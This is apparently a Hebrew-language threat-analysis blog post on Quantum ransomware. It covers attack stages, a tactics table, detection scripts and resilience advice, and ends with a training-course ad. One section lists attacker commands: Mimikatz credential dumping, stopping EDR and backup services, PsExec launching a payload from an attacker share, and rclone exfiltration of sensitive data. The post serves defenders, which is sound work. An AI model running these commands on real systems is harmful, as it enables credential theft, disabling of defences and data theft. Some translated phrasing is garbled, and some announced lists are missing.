
מחברת: ג'ניפר ווקר
עדכון אחרון: יוני 2024
מתקפות תוכנות כופר מתפתחות בקצב מפחיד, ותוכנת כופר Quantum מציבה רף חדש למהירות והרסניות בהתקפות. שלא כמו תוכנות כופר קונבנציונליות, תוכנת כופר Quantum מתוכננת לחדירה מהירה, פשרה של דומיין מלא והצפנת נתונים מלאה – לעיתים בפחות מארבע שעות. על ארגונים לתפוס הן את הדחיפות והן את התכונות הטכניות הייחודיות של הגרסה החדשה הזו של תוכנת כופר כדי לחזק את הסביבות ולהבטיח התאוששות.
בפוסט הבלוג מעמיק זה, נחקור את תוכנת כופר Quantum מגישה ראשונית להצפנת דומיין מלאה, נפרק את תהליכי הפנימיים עם דוגמאות זיהוי ותגובה מעשיות, ונדון בטקטיקות חוסן ומשמעות קריפטוגרפיית פוסט-קוונטום. תצאו ממנו עם הבנה מקיפה – מהתחלה ועד לרמות מתקדמות – של תוכנת הכופר Quantum, דוגמאות מהעולם האמיתי, קטעי קוד לזיהוי והמלצות לחוסן סייבר.
תוכנת הכופר Quantum מתייחסת לזן אגרסיבי במיוחד של תוכנת כופר (תוכנה זדונית המהונדסת להצפנת קבצים ולדרישת תשלומי כופר), הנודעת בשל מהירותה ויעילותה בהעתקת חומרי נתונים ברשת ובהצפנתם. מחקרי אבטחה (דו"ח WaterISAC) תיעדו מתקפות תוכנת כופר Quantum שהשיגו הצפנה כלל-דומיין בפחות מארבע שעות מגישה ראשונית - הרבה יותר מהר ממשפחות תוכנת כופר ישנות יותר.
מניחים שתוכנת הכופר Quantum קשורה במידה רבה לאקוסיסטם של תוכנת הכופר Conti (ראו דו"ח DFIR והמלצות CERT), ומציגה טקטיקות, טכניקות ונהלים (TTPs) דומים אך משופרים למהירות מקסימלית.
יש להניח שהכינוי "Quantum" מתייחס יותר למהירות ול"קפיצת קוונטום" במהירות התפעולים, ולא למחשוב קוונטום ממשי (אף על פי שהופעת מחשבים קוונטיים מציבה איומים חדשים על הקריפטוגרפיה, כפי שמפורט בהמשך פוסט זה). לעת עתה, יש להבין את תוכנת הכופר "Quantum" כגרסה מולארת של תוכנת כופר שמכריחה מגינים לפעול בטווח זמן הדוק.
אירוע תקיפה בולט של תוכנת הכופר Quantum שתואר על ידי WaterISAC ו-DFIR Report (מקור) הציג את ציר הזמן המטריד הבא:
התקפה זו מציגה את המהירות שבה פועלים היום נגדירים מודרניים ומדוע מנגנוני זיהוי ותגובה מסורתיים נכשלים לעיתים קרובות.
בואו נפרק מתקפת תוכנת כופר Quantum טיפוסית לשלבים הטכניים שלה — בהשתקפות של טקטיקות MITRE ATT&CK.
תוכנת הכופר Quantum משיגה לרוב גישה ראשונית באמצעות:
התקפה המרושעת שתוארה על ידי WaterISAC התחילה עם מייל פישינג המכוון לחשבון מועדף, באמצעות מסמך Office מסוכן כדי להאכיל את תוכנת המטען, שהביאה לאחר מכן את המטען של Quantum.
לאחר הגישה הראשונית, התוקפים עוברים במהירות לקצור אישורים:
המטרה כאן היא להשיג זכויות מנהלת דומיין.
היריבים משתמשים באישורים גנובים כדי לנווט על פני הסביבה:
הפועלים של תוכנת הכופר Quantum משביתים בקרת הגנה (אנטי-וירוס, EDR, סוכנים גיבוי), מחפשים מאגרי גיבוי כדי למחוק, ומכינים את הסביבה לקראת הצפנה המונית.
לבסוף, התוקפים מפרסים את מטען תוכנת הכופר Quantum:
תכנון Quantum מתמקד במקסום נקודות קצה מוצפנות לפני שכל זיהוי/תגובה יכולים להתערב משמעותית, מה שהופך את הזיהוי המהיר (בדקות, לא בשעות) והתגובה לחשובים לאין ערוך.
בואו נבחן את הקופסה השחורה: כיצד פועלת תוכנת הכופר Quantum באופן פנימי, ואילו ארטיפקטים היא מותירה?
| טקטיקה | טכניקה | כלי/פקודה |
|---|---|---|
| גישה ראשונית | פישינג/ניצול | מסמכי Office מסוכנים, CVE- |
| הגברת הרשאות | קציר אישורים | Mimikatz, lsass.exe dump |
| תנועה לרוחב | RDP, SMB, Cobalt Strike, PsExec | cobaltstrike, psexec.exe |
| הונאת הגנה | השבתת אנטי-וירוס/EDR, השבתת סוכני גיבוי | taskkill, sc.exe, net stop |
| השפעה (תוכנה כופרת) | הצפנה מסיבית | quantum.exe, פתקי כופר |
| יציאה | העברת קבצים ידנית, rclone, MEGAsync | rclone, curl, sftp |
| שימור | רישום שירותים, משימות מתוזמנות | schtasks, services.msc |
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"'
taskkill /F /IM veeamagent.exe
sc stop CrowdStrike
net stop "Sophos Endpoint Defense"
psexec.exe @hosts.txt -u .\Administrator -p MyP@ssw0rd -h -d \\attacker\share\quantum.exe
rclone copy C:\SensitiveData remote:exfiltrated --transfers=64 --multi-thread-streams=8
זיהוי תוכנת כופר Quantum יכול להיות כמו לרדוף אחר צללים, אך מגינים יכולים לעקוב אחר סימנים מזהירים אלו:
Bash: רשימת קבצים ששונו ב-60 הדקות האחרונות (הצפנים לעיתים קרובות מחדשים חותמות זמן של קבצים):
find /home -type f -mmin -60 2>/dev/null
Windows: קבלת 100 הקבצים האחרונים ששונו בכונן C:
Get-ChildItem -Recurse -Path C:\ |
Where-Object {!$_.PSIsContainer} |
Sort-Object LastWriteTime -Descending |
Select-Object -First 100 FullName, LastWriteTime
קריפטוגרפיית פוסט-קוונטום (PQC) מתייחסת לאלגוריתמים המתוכננים להיות בטוחים נגד יכולות מחשבים קוונטיים—מכונות המסוגלות לשבור קריפטוגרפיה קלאסית (כמו RSA/ELLIPSE כופלים) באמצעות אלגוריתם של Shor ואחרים.
ראו את ההשקפה המלאה של מייקל על איומים עתידיים אלה (יוטיוב: איומים קוונטיים מגיעים).
מתקפת תוכנת כופר Quantum היא מרוץ נגד הזמן. הכנה וחוסן הם התקוות הטובות ביותר שלך.
1. חיזוק נקודות גישה ראשוניות
2. הגבלת גישת משתמשים המיוחדים
3. ניטור תנועה לרוחב
4. הפרדת, הגנת וניטור גיבויים
5. סיגמנטציה ברשת
6. גילוי איומים ומודעות משתמשים
לפי פתרונות ההחלמה מתוכנות הכופר של Quantum לעסקים ופריימוורקס כמו NIST, שחזור מהיר ואמין הוא קריטי:
תוכנת כופר בדרך כלל משנה או מחליפה מספר גדול של קבצים במהירות. אתה יכול לסרוק מדי פעם כדי לזהות זאת:
find /home -type f -cmin -30 2>/dev/null | tee recent_changes.txt
# בדוק אם מספר חשוד של קבצים השתנה בזמן קצר
NUM_CHANGED=$(wc -l < recent_changes.txt)
if [ "$NUM_CHANGED" -gt 1000 ]; then
echo "אזהרה: שונו למעלה מ-$NUM_CHANGED קבצים ב-30 הדקות האחרונות!"
# אופציונלי להפעיל אזעקה או לבודד את המארח
fi
אתה יכול להשתמש בpython-evtx כדי לנתח יומני אירועים של Windows לחיפוש אחר סימנים כמו:
import evtx
import re
def parse_evtx_for_psexec(evtx_file):
with evtx.Evtx(evtx_file) as log:
for record in log.records():
xml = record.xml()
# רגולייר פשוט לצורך קובץ התמונה של PsExec, שפר דפוס לפי הצורך
if re.search(r'[\\/]PsExec\.exe', xml, re.IGNORECASE):
print(f"כלת PsExec זיהוי ברגע {record.timestamp()}:\n{xml}\n")
# שימוש
parse_evtx_for_psexec("C:\\Windows\\System32\\winevt\\Logs\\Security.evtx")
if 'powershell' in xml and 'EncodedCommand' in xml:
print("פעילות PowerShell חשודה פוטנציאלית זוהתה.")
תוכנת הכופר Quantum אינה רק מהירה; היא תחזית למה הרדיוס ההרסני של הסייבר העתידי יכול להראות. המירוץ בעיצומו בין מגנים המעצבים סביבות חוסן, נטולות אמון וסיגמנטציה טובה לבין יריבים הבונים כלים מתוחכמים יותר, אוטומטיים ומאיימים.
נקודות מפתח להפחתת חשיפת נתונים:
על ידי הבנת כלי תוכנת הכופר Quantum, הטכניקות שלה והמהירות, תהיה לך ההכנה הטובה ביותר להגן על הנכסים הדיגיטליים הקריטיים של הארגון שלך, להתאושש במהירות במקרה של האירוע הרע ביותר, ולבנות בסיס לחוסן כנגד האיומים הבאים.
ג'ניפר ווקר
כותבת ומנתחת אבטחת סייבר
עדכון יוני 2024
אם מצאתם את התוכן הזה בעל ערך, תארו לעצמכם מה תוכלו להשיג עם תוכנית ההכשרה המקיפה והאליטיסטית שלנו בת 47 שבועות. הצטרפו ליותר מ-1,200 סטודנטים ששינו את הקריירה שלהם בעזרת טכניקות יחידה 8200.